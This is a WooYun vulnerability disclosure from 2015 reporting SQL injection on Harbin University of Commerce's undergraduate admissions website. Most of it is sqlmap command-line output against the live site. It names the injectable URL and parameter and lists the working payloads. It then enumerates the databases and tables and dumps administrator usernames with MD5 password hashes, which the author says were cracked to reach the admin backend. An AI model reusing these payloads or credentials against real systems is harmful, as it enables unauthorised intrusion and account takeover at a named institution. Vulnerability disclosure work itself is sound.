当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096266

漏洞标题:哈尔滨商业大学本科生招生信息网一枚SQL注入漏洞,可得管理员账号密码

相关厂商:哈尔滨商业大学

漏洞作者: love_is_all

提交时间:2015-02-11 10:30

修复时间:2015-02-16 10:32

公开时间:2015-02-16 10:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-11: 细节已通知厂商并且等待厂商处理中
2015-02-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

哈商大本科招生信息网,http://zsb.hrbcu.edu.cn/markPResult.php?id=jxs存在注入点

漏洞证明:

注入点 http://zsb.hrbcu.edu.cn/markPResult.php?id=jxs

[01:01:48] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.3.8
back-end DBMS: MySQL 5.0
[01:01:48] [INFO] fetching database names
available databases [9]:
[*] cdcol
[*] hrb1
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth
[*] xsc
C:\sqlmap>sqlmap -u http://zsb.hrbcu.edu.cn/markPResult.php?id=jxs -D hrb1 --ta
les
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150128}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutua
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respo
sible for any misuse or damage caused by this program
[*] starting at 00:53:58
[00:53:59] [INFO] resuming back-end DBMS 'mysql'
[00:53:59] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requ
sts:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=jxs' AND 3525=3525 AND 'oBkI'='oBkI
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=jxs' AND (SELECT 3143 FROM(SELECT COUNT(*),CONCAT(0x717a707671,
SELECT (CASE WHEN (3143=3143) THEN 1 ELSE 0 END)),0x716a7a6b71,FLOOR(RAND(0)*2)
x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'RytH'='RytH
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: id=jxs' UNION ALL SELECT CONCAT(0x717a707671,0x4b775a685054564a445
,0x716a7a6b71)#
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: id=jxs'; SELECT SLEEP(5)--
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=jxs' AND SLEEP(5) AND 'EJyh'='EJyh
---
[00:53:59] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.3.8
back-end DBMS: MySQL 5.0
[00:53:59] [INFO] fetching tables for database: 'hrb1'
Database: hrb1
[18 tables]
+---------------------+
| admin_user          |
| college             |
| eduguide            |
| fangke              |
| in_out              |
| luqufenshu          |
| luqufenshu_full     |
| luqufenshu_info     |
| luqujieguo          |
| luquxinxi           |
| major               |
| online              |
| zhaosheng_gonggao   |
| zhaosheng_xinxi     |
| zhaosheng_zhengce   |
| zhaoshengjihua      |
| zhaoshengjihua_full |
| zhaoshengjihua_info |
+---------------------+
C:\sqlmap>sqlmap -u http://zsb.hrbcu.edu.cn/markPResult.php?id=jxs -D hrb1 -T ad
min_user --columns
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150128}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 00:54:27
[00:54:27] [INFO] resuming back-end DBMS 'mysql'
[00:54:27] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=jxs' AND 3525=3525 AND 'oBkI'='oBkI
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=jxs' AND (SELECT 3143 FROM(SELECT COUNT(*),CONCAT(0x717a707671,(
SELECT (CASE WHEN (3143=3143) THEN 1 ELSE 0 END)),0x716a7a6b71,FLOOR(RAND(0)*2))
x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'RytH'='RytH
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: id=jxs' UNION ALL SELECT CONCAT(0x717a707671,0x4b775a685054564a4450
,0x716a7a6b71)#
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: id=jxs'; SELECT SLEEP(5)--
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=jxs' AND SLEEP(5) AND 'EJyh'='EJyh
---
[00:54:28] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.3.8
back-end DBMS: MySQL 5.0
[00:54:28] [INFO] fetching columns for table 'admin_user' in database 'hrb1'
Database: hrb1
Table: admin_user
[4 columns]
+-----------------+-------------+
| Column          | Type        |
+-----------------+-------------+
| admin_user_id   | int(3)      |
| admin_user_name | varchar(30) |
| admin_user_pwd  | varchar(32) |
| admin_user_time | int(12)     |
+-----------------+-------------+
[00:54:28] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\zsb.hrbcu.edu.cn'
[*] shutting down at 00:54:28
C:\sqlmap>sqlmap -u http://zsb.hrbcu.edu.cn/markPResult.php?id=jxs -D hrb1 -T ad
min_user -C "admin_user_name, admin_user_pwd" --dump
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150128}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 00:54:59
[00:54:59] [INFO] resuming back-end DBMS 'mysql'
[00:54:59] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=jxs' AND 3525=3525 AND 'oBkI'='oBkI
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=jxs' AND (SELECT 3143 FROM(SELECT COUNT(*),CONCAT(0x717a707671,(
SELECT (CASE WHEN (3143=3143) THEN 1 ELSE 0 END)),0x716a7a6b71,FLOOR(RAND(0)*2))
x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'RytH'='RytH
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: id=jxs' UNION ALL SELECT CONCAT(0x717a707671,0x4b775a685054564a4450
,0x716a7a6b71)#
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: id=jxs'; SELECT SLEEP(5)--
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=jxs' AND SLEEP(5) AND 'EJyh'='EJyh
---
[00:55:00] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.3.8
back-end DBMS: MySQL 5.0
[00:55:00] [INFO] fetching columns 'admin_user_name, admin_user_pwd' for table '
admin_user' in database 'hrb1'
[00:55:00] [WARNING] reflective value(s) found and filtering out
[00:55:00] [INFO] fetching entries of column(s) 'admin_user_name, admin_user_pwd
' for table 'admin_user' in database 'hrb1'
[00:55:00] [INFO] analyzing table dump for possible password hashes
[00:55:00] [INFO] recognized possible password hashes in column 'admin_user_pwd'
do you want to store hashes to a temporary file for eventual further processing
with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q]
[00:55:04] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\sqlmap\txt\wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[00:55:05] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[00:55:07] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[00:55:07] [INFO] starting 2 processes
[00:55:52] [WARNING] no clear password(s) found
[00:55:52] [INFO] postprocessing table dump
Database: hrb1
Table: admin_user
[3 entries]
+-----------------+----------------------------------+
| admin_user_name | admin_user_pwd                   |
+-----------------+----------------------------------+
| admin           | 4d42625a4f1ceabfd9b0adedce5de94d |
| wangtao         | d163056c96097754156677a7375753ef |
| fengjianyuan    | d21abcb248174f8227db16aa3a833eca |
+-----------------+----------------------------------+


|admin | 4d42625a4f1ceabfd9b0adedce5de94d |
| wangtao | d163056c96097754156677a7375753ef |
| fengjianyuan | d21abcb248174f8227db16aa3a833eca |
md5解密后,登陆后台。http://zsb.hrbcu.edu.cn/admin

1.png

修复方案:

过滤

版权声明:转载请注明来源 love_is_all@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-02-16 10:32

厂商回复:

最新状态:

暂无

漏洞评价:

评论